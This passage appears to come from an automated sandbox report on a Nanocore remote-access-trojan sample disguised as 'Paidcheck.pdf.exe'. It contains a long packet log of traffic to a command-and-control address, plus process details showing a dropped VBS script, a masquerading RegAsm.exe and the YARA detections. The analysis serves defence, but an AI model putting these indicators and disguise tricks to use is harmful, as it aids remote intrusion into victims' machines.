                                                                          Jul 22, 2021 09:33:59.668450117 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.676424026 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.676582098 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.692431927 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.713453054 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.714766026 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.750545025 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.777388096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.777518034 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.786863089 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.800864935 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.800998926 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.823556900 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.842411995 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.842510939 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.850297928 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.861713886 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.865135908 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.869467974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.882478952 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.882572889 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.895797968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.912578106 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.912723064 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.949991941 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.993479013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.993580103 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.009231091 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.016278982 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.016627073 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.024384022 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.078775883 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.089085102 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.100263119 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.100378036 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.115302086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.133095980 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.133260012 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.150082111 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.166778088 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.166950941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.173075914 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.188682079 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.189166069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.203669071 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.250619888 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.288420916 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.294321060 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.294442892 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.303386927 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.312798977 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.312897921 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.322395086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.332878113 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.332987070 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.345494032 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.357359886 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.357440948 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.452893019 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.464427948 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.464567900 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.474500895 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.490668058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.490765095 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.503360987 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.520709038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.520816088 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.522670984 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.531475067 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.531619072 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.544415951 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.558434963 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.558639050 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.563431978 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.574357986 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.574559927 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.584412098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.593539000 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.593852997 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.601470947 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.616116047 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.616256952 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.624304056 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.634548903 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.634684086 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.637387991 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.651540041 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.651782990 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.662674904 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.673415899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.675432920 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.690422058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.704428911 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.704655886 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.723622084 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.732511044 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.732618093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.741506100 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.750482082 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.751476049 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.766474009 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.775655031 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.775804996 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.788451910 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.805483103 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.805557013 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.820717096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.829433918 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.829544067 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.847342014 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.851536989 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.851713896 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.863404036 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.873526096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.873792887 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.890571117 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.895745039 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.895903111 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.907707930 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.923410892 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.923579931 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.932100058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.948400021 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.948559999 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.965375900 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.972366095 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.973428965 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:00.984366894 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.993398905 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:00.993555069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.009454966 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.025535107 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.025705099 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.043493986 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.052589893 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.052826881 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.068428993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.088315010 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.088429928 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.094484091 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.110493898 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.110654116 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.128961086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.143094063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.143397093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.160460949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.178741932 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.178833008 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.195595026 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.212765932 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.212862968 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.228852987 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.242249012 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.245543957 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.258519888 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.270572901 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.271982908 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.285387993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.292732954 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.292812109 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.305527925 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.314357042 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.314475060 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:01.321445942 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:01.375821114 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:02.409060955 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:03.097852945 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:03.098475933 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:03.127830982 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:03.172806025 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:03.741720915 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:03.797908068 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:04.030874968 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:04.739908934 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:04.740052938 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:05.369945049 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:05.423017025 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:06.059742928 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:06.110538006 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:06.741765022 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:06.785574913 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:07.032005072 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:07.719038010 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:07.719165087 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:08.141485929 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:08.189234018 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:08.417613029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:08.480047941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:09.164833069 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:09.165029049 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:09.860044003 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:13.159770012 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:13.204888105 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:14.034142017 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:14.693492889 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:14.736962080 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:14.744725943 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:18.157227993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:18.205502987 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:20.034501076 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:20.931006908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:22.772069931 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:22.831180096 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:23.600013018 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:23.647324085 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:25.437051058 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:26.494678974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:28.171921968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:28.221828938 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:30.489131927 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:30.851744890 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:30.893963099 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:31.392728090 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:33.199666023 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:33.253510952 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:36.473505974 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:37.179678917 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:38.198149920 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:38.253837109 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:38.924010038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:38.972714901 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:42.521073103 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:43.207612038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:43.254285097 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:43.407711983 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:47.089696884 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:47.129823923 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:48.485667944 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:48.536133051 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:48.537753105 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:49.341768026 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:53.494880915 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:53.536688089 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:54.515841961 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:54.516031981 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:54.537192106 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:55.130913973 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:55.177248955 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:55.423207998 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:56.122750044 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:56.124728918 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:58.523781061 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:58.583744049 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:59.548140049 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:34:59.548693895 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:34:59.819869041 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:00.630836964 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:03.344820976 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:03.396615982 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:04.027657032 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:04.084240913 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:04.851340055 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:05.548763990 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:08.615627050 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:08.663320065 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:09.866552114 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:10.551702976 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:11.563858032 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:11.616128922 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:35:13.632576942 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:35:13.678745031 CEST497042018192.168.2.3217.138.212.57

                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: Paidcheck.pdf.exe PID: 4608 Parent PID: 5620

                                                                          General

                                                                          Start time:09:32:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Paidcheck.pdf.exe'
                                                                          Imagebase:0x6a0000
                                                                          File size:580096 bytes
                                                                          MD5 hash:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: wscript.exe PID: 1968 Parent PID: 4608

                                                                          General

                                                                          Start time:09:33:42
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
                                                                          Imagebase:0x1030000
                                                                          File size:147456 bytes
                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: RegAsm.exe PID: 2308 Parent PID: 4608

                                                                          General

                                                                          Start time:09:33:42
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Imagebase:0x760000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
